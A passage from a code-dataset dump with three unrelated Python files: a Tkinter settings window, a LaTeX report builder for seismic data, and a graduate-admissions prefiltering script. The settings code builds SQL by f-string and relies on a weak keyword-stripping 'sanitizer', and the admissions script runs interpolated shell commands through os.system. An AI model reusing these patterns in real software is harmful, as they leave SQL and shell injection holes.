= self.master.address_line3.get()[:150]\n optional_label = self.prepare(self.master.optional_label.get())\n default_city = self.prepare(self.master.default_city.get())\n default_state = self.prepare(self.master.default_state.get())\n default_note = self.prepare(self.master.default_note.get())\n table_label_1 = self.prepare(self.master.table_label_1.get())\n print_heading = self.prepare(self.master.print_heading.get())\n busniess_name = self.prepare(self.master.busniess_name.get())\n address_line1 = self.prepare(self.master.address_line1.get())\n address_line2 = self.prepare(self.master.address_line2.get())\n address_line3 = self.prepare(self.master.address_line3.get())\n conn = sqlite3.connect(\"DB/database\")\n cursor = conn.cursor()\n query = f'''UPDATE appdata SET optional_label='{optional_label}',default_city='{default_city}',default_state='{default_state}',default_note='{default_note}',table_label_1='{table_label_1}',print_heading='{print_heading}',busniess_name='{busniess_name}',address_line1='{address_line1}',address_line2='{address_line2}',address_line3 ='{address_line3}' WHERE srl=1'''\n cursor.execute(query)\n conn.commit()\n cursor.close()\n conn.close()\n self.extractSettingsData()\n tk.Label(self.master, text=\"Information:Settings Upadated. Restart the program to make changes in effect.\",\n bg=\"yellow green\", fg=\"white\", font=\"Arial 12 italic\").pack(side=tk.LEFT, anchor=\"w\", padx=10)\n\n def recover(self, data):\n data = data.replace(\"{\", \"(\")\n data = data.replace(\"}\", \")\")\n data = data.replace(\"^\", \"\\'\")\n return data\n\n def prepare(self, data):\n data = data.replace(\"(\", \"{\")\n data = data.replace(\")\", \"}\")\n data = data.replace(\"\\'\", \"^\")\n data = data.replace(\"\\\"\", \"\")\n data = data.replace(\";\", \"\")\n data = data.replace(\"DELETE\", \"\")\n data = data.replace(\"DROP\", \"\")\n return data\n\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n app = SettingsWindow(root)\n root.mainloop()","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":9714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"293866347","text":"# stdlib imports\nimport os\nimport time\nfrom shutil import which\n\n# third party imports\nimport numpy as np\nimport pandas as pd\n\n# local imports\nfrom gmprocess.config import get_config\n\nPREAMBLE = \"\"\"\n\\\\documentclass[9pt]{article}\n\\\\usepackage{helvet}\n\\\\renewcommand{\\\\familydefault}{\\\\sfdefault}\n\n\\\\usepackage{graphicx}\n\n% grffile allows for multiple dots in image file name\n\\\\usepackage{grffile}\n\n% Turn off page numbers\n\\\\usepackage{nopageno}\n\n% Needed for table rules\n\\\\usepackage{booktabs}\n\n\\\\usepackage[english]{babel}\n\n\\\\usepackage[letterpaper, portrait]{geometry}\n\n\\\\geometry{\n left=0.5in,\n top=0.5in,\n}\n\n\\setlength\\parindent{0pt}\n\n\\\\begin{document}\n\"\"\"\n\nPOSTAMBLE = \"\"\"\n\\\\end{document}\n\"\"\"\n\nSTREAMBLOCK = \"\"\"\n\\\\includegraphics[height=6.5in]\n {[PLOTPATH]}\n\n\"\"\"\n\nBEGIN_COL = \"\"\"\\\\begin{minipage}[t]{%s\\\\textwidth} \\\\scriptsize \\\\centering\"\"\"\n\nEND_COL = \"\"\"\\\\end{minipage}\"\"\"\n\n\ndef build_report(sc, directory, origin, config=None):\n \"\"\"\n Build latex summary report.\n\n Args:\n st (StreamCollection):\n StreamCollection of data.\n directory (str):\n Directory for saving report.\n\n \"\"\"\n # Need to get config to know where the plots are located\n if config is None:\n config = get_config()\n processing_steps = config['processing']\n # World's ugliest list comprehension:\n spd = [psd for psd in processing_steps\n if list(psd.keys())[0] == 'summary_plots'][0]\n plot_dir = spd['summary_plots']['directory']\n\n # Check if directory exists, and if not, create it.\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n # Initialize report string with PREAMBLE\n report = PREAMBLE\n\n # Loop over each StationStream and append it's page to the report\n # do not include more than three.\n for st in sc:\n plot_path = os.path.join('..', plot_dir, st.get_id() + '.png')\n SB = STREAMBLOCK.replace('[PLOTPATH]', plot_path)\n report += SB\n\n prov_latex = get_prov_latex(st)\n\n # for i, tr in enumerate(st):\n # # Disallow more than three columns\n # if i > 2:\n # break\n # if i == 0:\n # prov_latex = get_prov_latex(tr)\n # report += BEGIN_COL % \"0.4\"\n # else:\n # prov_latex = get_prov_latex(tr, include_prov_id=False)\n # report += BEGIN_COL % \"0.27\"\n # report += prov_latex\n # if tr.hasParameter('failure'):\n # report += '\\n' + tr.getParameter('failure')['reason']\n # report += END_COL\n # if i < len(st):\n # report += '\\\\hspace{2em}'\n report += prov_latex\n if not st.passed:\n for tr in st:\n if tr.hasParameter('failure'):\n report += '\\n' + tr.getParameter('failure')['reason']\n break\n report += '\\n\\\\newpage\\n\\n'\n\n # Finish the latex file\n report += POSTAMBLE\n\n # Do not save report if running tests\n if 'CALLED_FROM_PYTEST' not in os.environ:\n file_name = ('gmprocess_report_%s_%s.tex'\n % (origin['id'], time.strftime(\"%Y%m%d-%H%M%S\")))\n file_path = os.path.join(directory, file_name)\n with open(file_path, 'w') as f:\n f.write(report)\n\n # Can we find pdflatex?\n pdflatex_bin = which('pdflatex')\n # rc, so, se = get_command_output('%s %s' % (pdflatex_bin, file_path))\n return st\n\n\ndef get_prov_latex(st):\n \"\"\"\n Construct a latex representation of a trace's provenance.\n\n Args:\n st (StationStream):\n StationStream of data.\n\n Returns:\n str: Latex tabular representation of provenance.\n \"\"\"\n # start by sorting the channel names\n channels = [tr.stats.channel for tr in st]\n channelidx = np.argsort(channels).tolist()\n columns = ['Process Step',\n 'Process Attribute']\n\n trace1 = st[channelidx.index(0)]\n df = pd.DataFrame(columns=columns)\n df = trace1.getProvDataFrame()\n mapper = {'Process Value': '%s Value' % trace1.stats.channel}\n df = df.rename(mapper=mapper, axis='columns')\n for i in channelidx[1:]:\n trace2 = st[i]\n trace2_frame = trace2.getProvDataFrame()\n df['%s Value' % trace2.stats.channel] = trace2_frame['Process Value']\n\n lastrow = None\n newdf = pd.DataFrame(columns=df.columns)\n for idx, row in df.iterrows():\n if lastrow is None:\n lastrow = row\n newdf = newdf.append(row, ignore_index=True)\n continue\n if row['Index'] == lastrow['Index']:\n row['Process Step'] = ''\n newdf = newdf.append(row, ignore_index=True)\n lastrow = row\n\n newdf = newdf.drop(labels='Index', axis='columns')\n prov_string = newdf.to_latex(index=False)\n prov_string = '\\\\scriptsize\\n\\\\centering\\n' + prov_string\n return prov_string\n\n\ndef str_for_latex(string):\n \"\"\"\n Helper method to convert some strings that are problematic for latex.\n \"\"\"\n string = string.replace('_', '\\\\_')\n string = string.replace('$', '\\\\$')\n string = string.replace('&', '\\\\&')\n string = string.replace('%', '\\\\%')\n string = string.replace('#', '\\\\#')\n string = string.replace('}', '\\\\}')\n string = string.replace('{', '\\\\{')\n string = string.replace('~', '\\\\textasciitilde ')\n string = string.replace('^', '\\\\textasciicircum ')\n return string\n","sub_path":"gmprocess/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":5432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"474878504","text":"from __future__ import print_function #allows print as function\nimport sys, os.path\n\nVERBOSE = False\n\ndef die(*objs):\n print(\"ERROR: \", *objs, file=sys.stderr)\n exit(42)\n\nHOME_DIR = os.environ['HOME'] \nif not os.path.exists(HOME_DIR): die(\"HOME_DIR\", HOME_DIR, \"does not exist\")\n\nTOOLS_DIR = os.path.join(HOME_DIR,\"git\",\"dcs-gradapps-prefilter\")\nif not os.path.exists(TOOLS_DIR): die(\"TOOLS_DIR\", TOOLS_DIR, \"does not exist\")\n\n#where we rsync gradapps backup server to\nMSCAC_DIR = os.path.join(HOME_DIR,\"mscac\")\nif not os.path.exists(MSCAC_DIR): die(MSCAC_DIR, \"does not exist\")\n\n#dir where transcripts, sop, cv live\nMSCAC_PAPERS_DIR = os.path.join(MSCAC_DIR,\"public_html\",\"papers\")\nif not os.path.exists(MSCAC_PAPERS_DIR): die(MSCAC_PAPERS_DIR, \"does not exist\")\n\n#dir where application dirs containing profile.data live\nMSCAC_PROFILE_DATA_ROOT_DIR = os.path.join(MSCAC_DIR,\"public_html\",\"data\")\nif not os.path.exists(MSCAC_PROFILE_DATA_ROOT_DIR): die(MSCAC_PROFILE_DATA_ROOT_DIR, \"does not exist\")\n\n#CSV file university rankings are read from\nUNI_RANKING_CSV=os.path.join(MSCAC_DIR,\"uni-ranking.csv\")\nif not os.path.exists(UNI_RANKING_CSV): die(UNI_RANKING_CSV, \"university ranking file does not exist\")\n\n#shell script to fire up viewers on PDF files\nVIEWER = os.path.join(TOOLS_DIR,\"view-files.sh\")\nif not os.path.exists(VIEWER): die(VIEWER, \"does not exist\")\n\nGREP_SGS_NUM = os.path.join(TOOLS_DIR,\"grep-sgs-num.sh\")\nif not os.path.exists(GREP_SGS_NUM): die(GREP_SGS_NUM, \"does not exist\")\n\nGREP_ONE_SGS_NUM = os.path.join(TOOLS_DIR,\"grep-one-sgs-app-num.sh\")\nif not os.path.exists(GREP_ONE_SGS_NUM): die(GREP_SGS_NUM, \"does not exist\")\n \n#file listing which apps are complete\nCOMPLETE_FILE = os.path.join(MSCAC_DIR,\"public_html/admin/applicationStatus\")\nif not os.path.exists(COMPLETE_FILE): die(COMPLETE_FILE, \"does not exist\")\n\n#output file directory\nMSCAC_PREFILTER_DIR_NAME = \"mscac-prefilter\"\nOFN_DIR=os.path.join(HOME_DIR,MSCAC_PREFILTER_DIR_NAME)\nif not os.path.exists(OFN_DIR): die(\"OFN_DIR\", OFN_DIR, \"does not exist\")\n\n# where to rsync output file for gradapps\nCSLAB_USERID = 'matz@apps1.cs.toronto.edu'\n \n#obscure python way of deleting chars from unicode strings..\ntranslation_table_to_delete_chars = dict.fromkeys(map(ord, '!@#$;\"'), None)\n\ndef parse_rhs_profile_data_line(line):\n \"returns stuff to right of = found in gradapps profile.data files\"\n # EG: #set $sp364-value$ = \"2014-09|2018-05|UNIV OF TORONTO|BSC H|2.88/4.0|||||||||||||||\"; \n if VERBOSE: print(\"rhs\",line)\n try:\n rhs = line.split(\"=\")[1]\n except:\n print(\"failed to split = on \", line)\n exit(3)\n return rhs.strip().translate(translation_table_to_delete_chars)\n\n\ndef uni_ranking_dict_from_csv_file(fn,has_header):\n \"reads csv file mapping university name to (claire's) ranking\"\n import functools, csv\n #example line in CSV file:\n #UNIV OF TORONTO,1,top rank (canada),Canada,\n with open(fn) as csv_file:\n csv_file_reader = csv.reader(csv_file, delimiter=',', quotechar='\"',dialect=csv.excel_tab)\n if has_header:\n next(csv_file_reader)\n def acc(d, fields):\n d[fields[0]] = fields[1] \n return d\n return functools.reduce(acc, csv_file_reader, {})\n\n\ndef completed_dict_from_applicationStatus_file(fn):\n \"reads applicationStatus files and stashes away which apps are complete\"\n with open(fn,\"r\") as apf:\n import re\n map = {}\n for line in apf:\n fields = line.split(\" \")\n assert len(fields) == 2\n #TODO: re.compile ?\n if re.search(\"complete\",fields[1]):\n map[fields[0]] = True\n else:\n map[fields[0]] = False\n return map\n\nfrom enum import IntEnum\nclass GradAppsField(IntEnum):\n \"enum records reverse engineering of internal gradapps data fields\"\n # danger this depends on knowledge of internal gradapps data layout\n UNI_1 = 29 # in UI: Academic History: University 1 Name and Location\n UNI_2 = 87\n UNI_3 = 97\n OVERALL_AVG_1 = 36 # Academic History: University 1 Overall Average\n OVERALL_AVG_2 = 92\n OVERALL_AVG_3 = 102\n GENDER = 338\n SGS_NUM = 342\n DCS_STATUS = 363\n DCS_UNION_INSTITUTION = 364\n PREFILTER_STATUS = 418\n #GPA_1 = 35 # Academic History: University 2 Final Year Average\n #GPA_2 = 92 \n\ndef dict_from_profile_data_file(fn):\n \"turn a profile.data file into a dictionary with only a few fields\"\n #TODO: using a dict is ugly. I'm sure there are fancy libs to do this pretty\n #TODO: maybe types.SimpleNamespace(**d)\n #TODO: maybe csv.DictReader ?\n if VERBOSE: print(fn)\n with open(fn,\"r\") as profile_data_file:\n import re\n rec = {}\n for line in profile_data_file:\n for gf in GradAppsField:\n if re.search(\"sp\" + str(int(gf)) + \"-value\", line):\n rhs = parse_rhs_profile_data_line(line)\n rec[gf] = rhs\n if VERBOSE: print(\"line: \", line.strip(),\"matches:\",gf,rhs)\n return rec\n\ndef concoct_profile_data_file_name_from_app_number(app_num):\n \"\"\"concoct full path of profile.data file from app_num.\n Depends on inside knowledge of how gradapps stores its stuff\"\"\"\n profile_data_fn = os.path.join(MSCAC_PROFILE_DATA_ROOT_DIR,app_num,\"profile.data\")\n if not os.path.exists(profile_data_fn):\n die(\"cannot find\", profile_data_fn)\n assert os.path.exists(profile_data_fn)\n return profile_data_fn\n\ndef build_dict_of_dicts(list_of_app_numbers):\n \"\"\"read the listed app_num's, concoct the path to the profile.data file and turn the data there into a dict\"\"\"\n profile_data_by_app_number = {}\n for app_num in list_of_app_numbers:\n d = dict_from_profile_data_file(concoct_profile_data_file_name_from_app_number(app_num))\n profile_data_by_app_number[app_num] = d\n return profile_data_by_app_number\n\ndef list_of_app_numbers(fn_of_app_numbers):\n \"\"\"read the listed app_num's, concoct the path to the profile.data file and turn the data there into a dict\"\"\"\n list_of_app_numbers = []\n try:\n with open(fn_of_app_numbers, \"r\") as in_file:\n for l in in_file:\n app_num = l.strip()\n list_of_app_numbers.append(app_num)\n except:\n print(fn_file_list, \"failed to open for read? really? bail!\")\n import traceback\n traceback.print_exc(file=sys.stdout)\n exit(3)\n return None\n return list_of_app_numbers\n\ndef parse_args():\n \"parse the command line parameters of this program\"\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument( \"uni_filter_regexp\", help=\"university to filter by\" )\n #TODO: change to --skip-sort with default true\n parser.add_argument( \"--sort\", action=\"store_false\",\n help=\"without option menu sorted by grade. --sort leaves menu in order app_nums listed\")\n parser.add_argument( \"--skip-prefiltered\", action=\"store_true\",\n help=\"without option already prefiltered applications appeard. --prefiltered leaves out already prefiltered applications\")\n parser.add_argument(\"--app_num_list\", action=\"append\", nargs=\"+\", type=str, help=\"list of app numbers to prefilter\")\n \n ns = parser.parse_args() # returns a namespace.\n #butcher app_num_list. (this hackery proves I don't understand the use of add_argument)\n if ns.app_num_list:\n assert len(ns.app_num_list) == 1\n s = ns.app_num_list[0][0]\n print(s)\n ns.app_num_list = s.split()\n if VERBOSE: print(ns)\n return ns\n\ndef pdf_file_no_for_app(app_number,nn):\n \"concoct full path to transcript, cv, sop files for an app_num in papers dir\"\n #gradapps keeps the documents submitted by applicant in papers directory\n return os.path.join(MSCAC_PAPERS_DIR, str(app_number), \"file\" + app_num + \"-\" + str(nn) + \".pdf\")\n\ndef shorten_uni_name(uni_name):\n \"take a few common substrings out of institution name\"\n return ( uni_name.replace(\"UNIVERSITY\",\"\")\n .replace(\"UNIV\",\"\")\n .replace(\"university\",\"\")\n .replace(\"University\",\"\") \n .replace(\"INSTITUTION\",\"\").replace(\"INST\",\"\").replace(\"Institution\",\"\").replace(\"institution\",\"\")\n .replace(\" of\",\"\").replace(\" OF\",\"\")\n .replace(\"Science\",\"Sci\").replace(\"science\",\"sci\")\n .replace(\"Technology\",\"Tech\").replace(\"technology\",\"tech\")\n .lstrip(\" \")\n .rstrip(\" \")\n .replace(\" \",\"_\") )\n\ndef extract_gpa(profile_data, u_field_name,gpa_field_name):\n \"WIP extract gpa from text field attempting to work around common applicant mistakes\"\n if not u_field_name in profile_data.keys():\n return None\n if not gpa_field_name in profile_data:\n return None\n gpa_str = profile_data[gpa_field_name]\n try:\n return float(gpa_str) #normal case where applicant entered a number..\n except:\n #some applicants take it into their heads to enter \"3.999/4\", or \"89% (first class honours)\"\n fields = re.compile(\"[%/]\").split(gpa_str)\n if len(fields) > 1:\n try:\n # last try.. if first field is a number return that.\n return float(fields[0])\n except:\n return None\n else:\n return None\n\ndef extract_gpa_from_multiple_fields(profile_data):\n gpa1 = extract_gpa(profile_data, GradAppsField.UNI_1,GradAppsField.OVERALL_AVG_1)\n if gpa1:\n return gpa1\n gpa2 = extract_gpa(profile_data, GradAppsField.UNI_2,GradAppsField.OVERALL_AVG_2)\n if gpa2:\n return gpa2\n gpa3 = extract_gpa(profile_data, GradAppsField.UNI_3,GradAppsField.OVERALL_AVG_3)\n if gpa3:\n return gpa3\n return None\n\ndef extract_uni(profile_data, u_field_name):\n \"WIP \"\n if not u_field_name in profile_data.keys():\n return None\n return profile_data[u_field_name]\n \ndef extract_uni_name_from_multiple_fields(profile_data):\n #TODO: make this into map\n uni1 = extract_uni(profile_data, GradAppsField.UNI_1)\n if uni1:\n return uni1\n uni2 = extract_uni(profile_data, GradAppsField.UNI_2)\n if uni2:\n return uni2\n uni3 = extract_uni(profile_data, GradAppsField.UNI_3)\n if uni3:\n return uni3\n return \"-\"\n \n#try and sort app_num_list by GPA\ndef extract_gpa_for_sorted(profile_data):\n gpa = extract_gpa_from_multiple_fields(profile_data)\n if gpa:\n return gpa\n else:\n #print(\"grade field parsing failed, using zero\")\n return 0.0\n\n \n# warning, this depends on secret knowledge of gradapps status codes\n# (the int values depend on the order of some radio button that Lloyd set up)\n# TODO: build this from enum\nprefilter_status_map = {\n 1: \"Reject\",\n 2: \"Pass-Star\",\n 3: \"Pass-VGE\",\n 4: \"NCS-Reject\",\n 5: \"NCS-Pass\",\n 6: \"Pass-Unsure\",\n 7: \"Pass-Good\",\n 8: \"NCS-Star\",\n }\ndef extract_prefilter_status(profile_data):\n \"map the prefilter status value extracted from gradapps to its string name\"\n try:\n return prefilter_status_map[int(profile_data[GradAppsField.PREFILTER_STATUS])]\n except:\n return \"-\"\n\ndef pretty_print_app_list(app_num_to_profile_data_dict,num_list,file_whatsit,session_prefilter_decision_map):\n \"print the list of applicants to filter, or just after filtering\"\n # TODO: figure out better way to do nasty session_prefilter_decision_map thing (needed to reuse this code to pretty print after menu)\n #TODO: rename file_whatsit\n print(\"\\n\\n===============================\\nAPPS matching: \",uni_filter_regexp)\n for app_num in num_list:\n profile_data = app_num_to_profile_data_dict[app_num]\n sgs_num = profile_data[GradAppsField.SGS_NUM]\n if session_prefilter_decision_map:\n # run after decisions have been made this session\n if sgs_num in session_prefilter_decision_map:\n prefilter_status = session_prefilter_decision_map[sgs_num]\n else:\n prefilter_status = \"Skip\" #skipped making decision, so nothing in map\n else:\n # being run before starting the session, no decisions yet\n prefilter_status = extract_prefilter_status(profile_data)\n\n print(\"%5s\" % app_num,\n profile_data[GradAppsField.GENDER],\n \"%11s\" % prefilter_status,\n \"%5.1f\" % extract_gpa_for_sorted(profile_data),\n \"%12s\" % sgs_num,\n profile_data[GradAppsField.DCS_UNION_INSTITUTION].rstrip('|'),\n file=file_whatsit\n )\n \n print(\"===============================\\n\")\n \ndef write_to_new_file(header_line, fn,dict):\n \"\"\"write all lines out to a new file name\"\"\"\n #TODO: use csv.writer ?\n #TODO: rename new_csv_file\n if VERBOSE: print(\"write_to_new_file:\",fn,dict)\n if os.path.exists(fn):\n os.system(\"mv %s %s\" % (fn, \"/tmp\"))\n if VERBOSE: print(\"existing %s moved to /tmp\" % fn)\n with open(fn,'w') as new_file:\n print(header_line,file=new_file)\n for k in dict.keys():\n line = k + \",\" + str(dict[k])\n if VERBOSE: print(\"write_to_new_file:\",line)\n print(line,file=new_file)\n\n\ndef read_query_from_input(prompt):\n \"UI read a line from stdin\"\n try:\n # readline will do completion on utorid's but can enter any string from grade file too\n query_string = input(prompt)\n if len(query_string) == 0:\n return None\n else:\n return query_string\n except KeyboardInterrupt:\n print(\"..keyboard interrupt..\")\n return '' #empty string\n except EOFError:\n print(\"..eof..\")\n return None\n\ndef prefilter_status_field(profile_data):\n \"the prefilter status field we will set for the application has school and gpa\"\n uni_name = extract_uni_name_from_multiple_fields(profile_data)\n gpa = extract_gpa_from_multiple_fields(profile_data)\n if gpa == None:\n gpa = 0.0\n status = \"%s-%.1f\" % (shorten_uni_name(uni_name),gpa)\n return status\n\ndef prefilter_prompt(app_num,profile_data,ix,n):\n \"prompt line with a bunch of very compressed info. gender, school, rank, gpa \"\n uni_name = extract_uni_name_from_multiple_fields(profile_data)\n try:\n ranking = int(uni_ranking[uni_name])\n except:\n ranking = 1001\n prompt = \"%d) %d/%d %s %s %03d\" % (app_num, ix, n, profile_data[GradAppsField.GENDER],\n prefilter_status_field(profile_data), ranking)\n return prompt\n\n \ndef prefilter_info_panel(app_num,profile_data,ix,n):\n \"compact, few line, application history\"\n def extract_uni_info_tuple( which_uni, which_mark):\n \"return tuple fetching info about app's schooling \"\n uni_name = extract_uni(profile_data, which_uni)\n gpa = None\n rank = None\n if uni_name:\n gpa = extract_gpa(profile_data, which_uni, which_mark)\n try:\n rank = int(uni_ranking[uni_name])\n except:\n return (uni_name, gpa, 1001) #ie sentinel (bogus) rank\n return (uni_name,gpa,rank)\n def append_to_panel(ix,tuple,fmt):\n \"refactor format code until it looks like this\"\n (uni1,gpa1,rank1) = tuple\n if uni1:\n return fmt % (ix, uni1,gpa1,rank1)\n else:\n return \"%-5d-\\n\" % ix\n \n HDR_FMT = \"%-5s%-40s %5s %5s\\n\"\n FMT = \"%-5d%-40s %5s %5s\\n\"\n \n panel = \"institution info from app %d:\\n\" % (int(app_num))\n panel += append_to_panel( \"=\"*4, (\"=\"*40, \"=\"*5, \"=\"*5), HDR_FMT)\n panel += append_to_panel( \"#\", (\"Institution\", \"GPA\", \"rank\"), HDR_FMT)\n panel += append_to_panel( \"-\"*4, (\"-\"*40, \"-\"*5, \"-\"*5), HDR_FMT)\n panel += append_to_panel(1, extract_uni_info_tuple(GradAppsField.UNI_1, GradAppsField.OVERALL_AVG_1),FMT)\n panel += append_to_panel(2, extract_uni_info_tuple(GradAppsField.UNI_2, GradAppsField.OVERALL_AVG_2),FMT)\n panel += append_to_panel(3, extract_uni_info_tuple(GradAppsField.UNI_3, GradAppsField.OVERALL_AVG_3),FMT)\n panel += append_to_panel( \"=\"*4, (\"=\"*40, \"=\"*5, \"=\"*5), HDR_FMT)\n return panel\n\ndef batch_hack(app_num_to_profile_data, completed_app_dict):\n \"this printed out a csv file which we used to clean up the dcs application status fields\"\n app_num_list = []\n for app_num in app_num_to_profile_data.keys():\n profile_data = app_num_to_profile_data[app_num]\n institution = profile_data[GradAppsField.DCS_UNION_INSTITUTION]\n if VERBOSE: print(\"institution\",uni_filter_regexp, institution)\n if not app_num in completed_app_dict.keys():\n if VERBOSE:print(\"skip\", app_num, \"because not complete\")\n continue\n elif len(profile_data[GradAppsField.PREFILTER_STATUS]) == 0:\n if VERBOSE: print(\"skip\", app_num, \"because prefilter_status not set\")\n continue\n app_num_list.append(app_num)\n #print(app_num_list)\n #print(prefilter_status_map[1])\n for app_num in app_num_list:\n profile_data = app_num_to_profile_data[app_num]\n prefilter_dec = int(profile_data[GradAppsField.PREFILTER_STATUS])\n if prefilter_dec == 1 or prefilter_dec == 4:\n continue #skip reject\n sgs_num = profile_data[GradAppsField.SGS_NUM]\n #print(sgs_num, prefilter_status_map[prefilter_dec],prefilter_status_field(profile_data))\n print(\"%s,%s\" % (sgs_num, prefilter_status_field(profile_data)))\n exit(0) #make sure batch goes no further\n\ndef sams_batch_hack(app_num_to_profile_data):\n \"this printed out a csv file which we used to set ALL dcs application status fields to the prefilter one\"\n app_num_list = []\n for app_num in app_num_to_profile_data.keys():\n profile_data = app_num_to_profile_data[app_num]\n ## if len(profile_data[GradAppsField.DCS_STATUS]) != 0:\n ## if VERBOSE: print(app_num, \"skip because DCS_STATUS already set to\", profile_data[GradAppsField.DCS_STATUS])\n ## continue\n app_num_list.append(app_num)\n\n if len(app_num_list)==0:\n die(\"sams_batch_hack: no apps remain after filtering.. nothing to do\")\n return\n print(\"CSV file created by sams_batch_hack: sets dcs_application_status\")\n for app_num in app_num_list:\n profile_data = app_num_to_profile_data[app_num]\n sgs_num = profile_data[GradAppsField.SGS_NUM]\n if VERBOSE: print(app_num,end='')\n print(\"%s,%s\" % (sgs_num, prefilter_status_field(profile_data)))\n sys.stdout.flush()\n\n \ndef find_app_numbers_in_filesystem(public_html_data_dir):\n \"\"\"find all the app numbers in the system by recursing the tree. each dir containing\n a file called profile.data identifies an application\"\"\"\n import os\n app_nums = []\n for root, dirs, files in os.walk(public_html_data_dir):\n for file in files:\n if file == \"profile.data\":\n if VERBOSE:\n print(root,dirs,os.path.join(root, file))\n print(os.path.basename(root))\n app_nums.append(str(os.path.basename(root)))\n return app_nums\n\nif __name__ == '__main__': \n import sys,os,re,functools\n #duplicate. sorta. so works on mac and windows laptops\n for dir in [TOOLS_DIR]:\n sys.path.append(dir)\n \n cmd_line_parm_ns = parse_args()\n cmdline_app_num_list = cmd_line_parm_ns.app_num_list\n uni_filter_regexp = cmd_line_parm_ns.uni_filter_regexp\n\n #read csv file ranking universities\n uni_ranking = uni_ranking_dict_from_csv_file(UNI_RANKING_CSV,has_header=False)\n \n completed_app_dict = completed_dict_from_applicationStatus_file(COMPLETE_FILE)\n\n import datetime\n now = datetime.datetime.now()\n fn_suffix = \"-%s-%s-%s_%s:%s\" % ( now.year, now.month, now.day, now.hour, now.minute)\n\n if cmd_line_parm_ns.app_num_list:\n #just the apps that were passed on command line\n app_num_list = cmd_line_parm_ns.app_num_list\n else:\n #go find them all\n app_num_list = find_app_numbers_in_filesystem(\"./public_html/data\")\n\n if VERBOSE: print(\"app_num_list\",app_num_list)\n \n #build a dict for each profile.data directory\n app_num_to_profile_data = build_dict_of_dicts(app_num_list)\n\n if VERBOSE: print(\"app_num_to_profile_data\",app_num_to_profile_data)\n\n ## print(\"prefilter_prompt\", prefilter_status_field(app_num_to_profile_data[\"858\"]))\n ## exit(0)\n # this is the spot to run scripts that see all the profile.data files and do stuff\n # like prepare a csv file to curl to the gradapps server\n #\n if False:\n try:\n sams_batch_hack(app_num_to_profile_data) #reset all dcs application status\n except:\n import traceback\n traceback.print_exc(file=sys.stderr)\n die(\"batch script throws\")\n exit(0)\n \n # now that have read all the data, filter per command line options into app_num_list\n app_num_list = []\n\n for app_num in app_num_to_profile_data.keys():\n profile_data = app_num_to_profile_data[app_num]\n institution = profile_data[GradAppsField.DCS_UNION_INSTITUTION]\n if VERBOSE: print(\"institution\",institution)\n #TODO: re.compile ?\n if not re.search(uni_filter_regexp, institution):\n if VERBOSE: print(\"skip\", app_num, \"because\", institution, \"not matched by\", uni_filter_regexp)\n else:\n sop_fn = pdf_file_no_for_app(app_num,1)\n cv_fn = pdf_file_no_for_app(app_num,2)\n transcript_fn = pdf_file_no_for_app(app_num,3)\n if not app_num in completed_app_dict.keys():\n if VERBOSE:print(\"skip\", app_num, \"because not complete\")\n continue\n elif cmd_line_parm_ns.skip_prefiltered and len(profile_data[GradAppsField.PREFILTER_STATUS]) > 0:\n if VERBOSE: print(\"skip\", app_num, \"because prefilter_status already set\")\n continue\n elif not os.path.exists(transcript_fn):\n print(\"skip\", app_num, \"because transcript does not exist\",transcript_fn)\n elif not os.path.exists(sop_fn):\n print(\"skip\", app_num, \"because SOP does not exist\")\n elif not os.path.exists(cv_fn):\n print(\"skip\", app_num, \"because CV does not exist\")\n else:\n app_num_list.append(app_num)\n \n if len(app_num_list) == 0:\n if cmd_line_parm_ns.skip_prefiltered:\n print(\"you have --skip-prefiltered active. perhaps no matching apps remain?\")\n die(\"no app matches university\", uni_filter_regexp)\n\n if cmd_line_parm_ns.sort:\n #TODO this re-sorts by GPA. bug? maybe should leave sort by app_num_list as above\n app_num_list = sorted(app_num_list,\n key=lambda app_num: extract_gpa_for_sorted(app_num_to_profile_data[app_num]),\n reverse=True\n )\n \n # check for repeat prefiltering. grep for app_nums in OFN_DIR\n grep_arg = \"\\|\".join(map(lambda app_num: app_num_to_profile_data[app_num][GradAppsField.SGS_NUM], app_num_list))\n if len(grep_arg) == 0:\n print(app_num_list)\n die(\"no sgs number for app_num\", app_num)\n cmd = \"%s '%s'\" % (GREP_SGS_NUM, grep_arg)\n\n if not os.system(cmd) == 0:\n sys.stdout.flush()\n print(\"found apps in log file that suggest they are repeats.. do you want to do grep loop to find the files?\")\n resp = input(\"y to do n**2 (SLOW!!) grep loop to find the apps > \")\n if resp.lower() == 'y':\n buf = \" \"\n badness = False\n bad = []\n #this is n**2 and actually takes a long time. if we need it rewrite to be linear in number of files.\n for app_num in app_num_list:\n cmd = \"%s %s %s\" % (GREP_ONE_SGS_NUM, str(app_num), str(app_num_to_profile_data[app_num][GradAppsField.SGS_NUM])) \n if not os.system(cmd) == 0:\n badness = True\n bad.append(app_num)\n msg = app_num_to_profile_data[app_num][GradAppsField.PREFILTER_STATUS]\n if len(msg) == 0:\n msg = \"prefilter status not set\"\n print( \"==>> in profile.data\", msg)\n if badness:\n print(\"some of these app_nums appear to have been pre-filtered earlier\")\n print(bad)\n sys.stdout.flush() \n resp = input(\"d to delete them from list and continue? q to exit > \")\n if resp.lower().startswith('q'):\n exit(0)\n if resp.lower().startswith('d'):\n for bad_app_num in bad:\n app_num_list.remove(bad_app_num)\n print(\"remaining applications:\", app_num_list)\n \n pretty_print_app_list(app_num_to_profile_data,app_num_list,sys.stdout,None)\n\n # print list before starting and prompt \n if False:\n try:\n print(\"prefilter above \" + str(len(app_num_list)) + \" applications?\")\n print(\"matching filter:\", uni_filter_regexp)\n response = input(\"enter to continue, q to exit > \")\n except:\n response = None\n import traceback\n traceback.print_exc(file=sys.stderr)\n die(\"oops\")\n \n if response == None or (len(response) > 0 and not response.lower().startswith(\"y\")):\n die(\"actually entering any char bails out.. only hitting enter alone continues.. :)\")\n\n from menu import PrefilterMenu\n\n # what to display in menu\n menu_line_dict = { 's' : \"Pass-Star: Star applicant pass prefilter. maybe early admission\",\n 'v' : \"Pass-VGE: Very Good applicant. pass prefilter\",\n 'g' : \"Pass-G: Good applicant. pass prefilter\",\n 'u' : \"Unsure: whether this applicant should pass prefilter\",\n 'r' : \"Reject: Reject application. fails prefilter\",\n 'x' : \"NCS-Reject: not enough CS. 